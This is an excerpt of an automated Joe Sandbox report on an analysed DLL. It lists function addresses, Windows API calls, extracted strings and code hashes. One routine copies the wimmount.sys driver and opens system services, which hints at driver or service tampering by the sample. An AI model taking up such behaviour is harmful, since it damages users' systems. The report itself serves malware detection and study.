                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5d18921a5f887a8f0bd91cae78e600397241d1b89ad43e444cfeaf66ad429a54
                                                                                                                                      • Instruction ID: 75151c8a6e33fa5f65666cfb855c4b0d0d1667ff9003005654a1b07a663b16f7
                                                                                                                                      • Opcode Fuzzy Hash: 5d18921a5f887a8f0bd91cae78e600397241d1b89ad43e444cfeaf66ad429a54
                                                                                                                                      • Instruction Fuzzy Hash: 757128744043059FD300DBA4CE80E2BB7E8AF8532CF64995CF45A472A1EF75E909CBA2
                                                                                                                                      Function 69EB049B Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GlobalLock.KERNEL32(?), ref: 69EB04BA
                                                                                                                                      • lstrcmpA.KERNEL32(?,?), ref: 69EB04C6
                                                                                                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 69EB04D8
                                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 69EB04F8
                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 69EB0500
                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 69EB050A
                                                                                                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 69EB0517
                                                                                                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 69EB052F
                                                                                                                                        • Part of subcall function 69EB6ABF: GlobalFlags.KERNEL32(?), ref: 69EB6ACE
                                                                                                                                        • Part of subcall function 69EB6ABF: GlobalUnlock.KERNEL32(?,?,00000000,?,69EB0529,?,00000000,?,?,00000000,00000000,00000002), ref: 69EB6AE0
                                                                                                                                        • Part of subcall function 69EB6ABF: GlobalFree.KERNEL32(?), ref: 69EB6AEB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 168474834-0
                                                                                                                                      • Opcode ID: 7fb51d703a1e001315fe9d85af060e69edff3321e9cecad3619090d9be29b15f
                                                                                                                                      • Instruction ID: 9a13c0611cfab4185c07b89c9f0be7b980f62e57430a00c973615db41f8640ad
                                                                                                                                      • Opcode Fuzzy Hash: 7fb51d703a1e001315fe9d85af060e69edff3321e9cecad3619090d9be29b15f
                                                                                                                                      • Instruction Fuzzy Hash: 79118C76500904BBDB229BA6DF48D6F7AEDFB8AB58724401DF605D6124D731EA01DB20
                                                                                                                                      Function 69EBBD28 Relevance: 12.0, APIs: 8, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 69EBBD37
                                                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 69EBBD3E
                                                                                                                                      • GetSystemMetrics.USER32(00000002), ref: 69EBBD45
                                                                                                                                      • GetSystemMetrics.USER32(00000003), ref: 69EBBD4F
                                                                                                                                      • GetDC.USER32(00000000), ref: 69EBBD59
                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 69EBBD6A
                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 69EBBD72
                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 69EBBD7A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MetricsSystem$CapsDevice$Release
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1151147025-0
                                                                                                                                      • Opcode ID: 795d9453b9e3c0d8ed83032380015f755551dbe865d1a1d0b68b73782c8cf67d
                                                                                                                                      • Instruction ID: aa2d395c7979e9266a81afbdd72d28e5f6ea1ad60a1068b0bdd9b3de53ac0843
                                                                                                                                      • Opcode Fuzzy Hash: 795d9453b9e3c0d8ed83032380015f755551dbe865d1a1d0b68b73782c8cf67d
                                                                                                                                      • Instruction Fuzzy Hash: DDF06DB1E80758AAEB105FB29C4DF1A7FA8FB86761F004417E6059B2C0CBB599158FC0
                                                                                                                                      Function 69EC04A6 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                      • Opcode ID: 1fbf5b8c36af744d7ad7c7c55a42dd3cf52554194774a284ada08d73f85ea300
                                                                                                                                      • Instruction ID: 3193f6f0654ff00f852e052ec226dcc61bd60a0c40efdccd140398d7b2714ccd
                                                                                                                                      • Opcode Fuzzy Hash: 1fbf5b8c36af744d7ad7c7c55a42dd3cf52554194774a284ada08d73f85ea300
                                                                                                                                      • Instruction Fuzzy Hash: B851F7B0900604EFCF208FA98A4469FBB75FF9136AF308629F8B556290D730DA51CF52
                                                                                                                                      Function 69E8AC60 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strncpy
                                                                                                                                      • String ID: jdnx.rar$shnx.rar$wqnx.rar$ydnx.rar$yznx.rar
                                                                                                                                      • API String ID: 2961919466-3273856767
                                                                                                                                      • Opcode ID: 59b467a0321e1b46a9044614ac36bd36036a0ec8ab8e71e21d8cc86bc23a76a5
                                                                                                                                      • Instruction ID: b180180bfd266e39e09764955a19695fedce0ae98dec8f5bdcdbafcf55fdcfa7
                                                                                                                                      • Opcode Fuzzy Hash: 59b467a0321e1b46a9044614ac36bd36036a0ec8ab8e71e21d8cc86bc23a76a5
                                                                                                                                      • Instruction Fuzzy Hash: 1841E4355446429BC307CA54DB28BE237E99B4631DB38C999D89ACB290FB34D50DCBC0
                                                                                                                                      Function 69E8AE20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 145COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E87A04: _memset.LIBCMT ref: 69E87A38
                                                                                                                                        • Part of subcall function 69E87A04: _memset.LIBCMT ref: 69E87A52
                                                                                                                                        • Part of subcall function 69E87A04: _memset.LIBCMT ref: 69E87A6C
                                                                                                                                        • Part of subcall function 69E87A04: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 69E87A8A
                                                                                                                                        • Part of subcall function 69E87A04: wsprintfA.USER32 ref: 69E87AA8
                                                                                                                                        • Part of subcall function 69E87A04: CopyFileA.KERNEL32(C:\Windows\System32\drivers\wimmount.sys,?,00000000), ref: 69E87AC0
                                                                                                                                        • Part of subcall function 69E87A04: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 69E87AD7
                                                                                                                                        • Part of subcall function 69E87A04: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 69E87B32
                                                                                                                                        • Part of subcall function 69E87A04: CloseServiceHandle.ADVAPI32(00000000), ref: 69E87B72
                                                                                                                                      • _strncpy.LIBCMT ref: 69E8AF97
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$OpenService$CloseCopyDirectoryFileHandleManagerWindows_strncpywsprintf
                                                                                                                                      • String ID: jdtc.rar$shtc.rar$wqtc.rar$ydtc.rar$yztc.rar
                                                                                                                                      • API String ID: 135036966-2268903407
                                                                                                                                      • Opcode ID: c9cdecd7747154beb92ef1718e8ab3ea1282bbd28687f41a349ab3e1bab43bc3
                                                                                                                                      • Instruction ID: 0db70104b856b0c46303a859d0a5ce3006ed5b5decdd21cf736657ffa0374e34
                                                                                                                                      • Opcode Fuzzy Hash: c9cdecd7747154beb92ef1718e8ab3ea1282bbd28687f41a349ab3e1bab43bc3
                                                                                                                                      • Instruction Fuzzy Hash: 9D4149795446419FC303CB94DB187F237E5AB41318B38C999D8898BA91FB34E64DCBC0
                                                                                                                                      Function 69EAC1D0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 143COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _swscanf.LIBCMT ref: 69EAC24E
                                                                                                                                        • Part of subcall function 69EC0968: _vscan_fn.LIBCMT ref: 69EC097F
                                                                                                                                      • _swscanf.LIBCMT ref: 69EAC283
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _swscanf$_vscan_fn
                                                                                                                                      • String ID: $ $%lf$' is not a number.
                                                                                                                                      • API String ID: 241522225-717049023
                                                                                                                                      • Opcode ID: baa43ca21d903c6fd7b30590f5aa78e12fe22ae742b2afb8ca6c4701fd19f860
                                                                                                                                      • Instruction ID: 0fcd6232312b13041ea75de70a44f1856803eb0b017ad5edc038ee67e68bb5ed
                                                                                                                                      • Opcode Fuzzy Hash: baa43ca21d903c6fd7b30590f5aa78e12fe22ae742b2afb8ca6c4701fd19f860
                                                                                                                                      • Instruction Fuzzy Hash: E5512BB5D00219DBDF14CF94C990BEEBBB4AB58304F2081ADD459AB250EB359A85CFA1
                                                                                                                                      Function 69E88690 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 115COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID: 2$PrsProt
                                                                                                                                      • API String ID: 2102423945-1774862053
                                                                                                                                      • Opcode ID: 5b59afaf39394e1ee84e696698b3fac8c011f059fed214a53a080544074145e4
                                                                                                                                      • Instruction ID: 96413530479763c78e2e4bfece833cfbdede06b93a3e2bebcc1130c8ce1ff18e
                                                                                                                                      • Opcode Fuzzy Hash: 5b59afaf39394e1ee84e696698b3fac8c011f059fed214a53a080544074145e4
                                                                                                                                      • Instruction Fuzzy Hash: FB41C1355083819FD325CB68E951BDBB7E8AF85704F14891CE9D98B241EB70A60CCBE3
                                                                                                                                      Function 69EA4C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 69EA4C9E
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • _memset.LIBCMT ref: 69EA4CAE
                                                                                                                                      • _memset.LIBCMT ref: 69EA4CC8
                                                                                                                                      • _sprintf.LIBCMT ref: 69EA4CDB
                                                                                                                                      • _memset.LIBCMT ref: 69EA4CEF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$AllocateHeap_malloc_sprintf
                                                                                                                                      • String ID: 1
                                                                                                                                      • API String ID: 1551421819-2212294583
                                                                                                                                      • Opcode ID: 58597bb1ffdd789e3e28d234624945b81593fd3a67c62548689b2fac9510e80b
                                                                                                                                      • Instruction ID: 808eff99f2479495b8c919f4c2a409bba2c345a0310b59c7f7fcc18983624dc4
                                                                                                                                      • Opcode Fuzzy Hash: 58597bb1ffdd789e3e28d234624945b81593fd3a67c62548689b2fac9510e80b
                                                                                                                                      • Instruction Fuzzy Hash: F03124710082859FD311CB2499A5EEF77E8AFC5308F14892EE5D58B114EF35960CC3A2
                                                                                                                                      Function 69EB9145 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69EB91D4
                                                                                                                                      • SendMessageA.USER32(00000000,00000405,00000000,?), ref: 69EB91FD
                                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 69EB920F
                                                                                                                                      • GetWindowLongA.USER32(?,000000FC), ref: 69EB9220
                                                                                                                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 69EB923C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
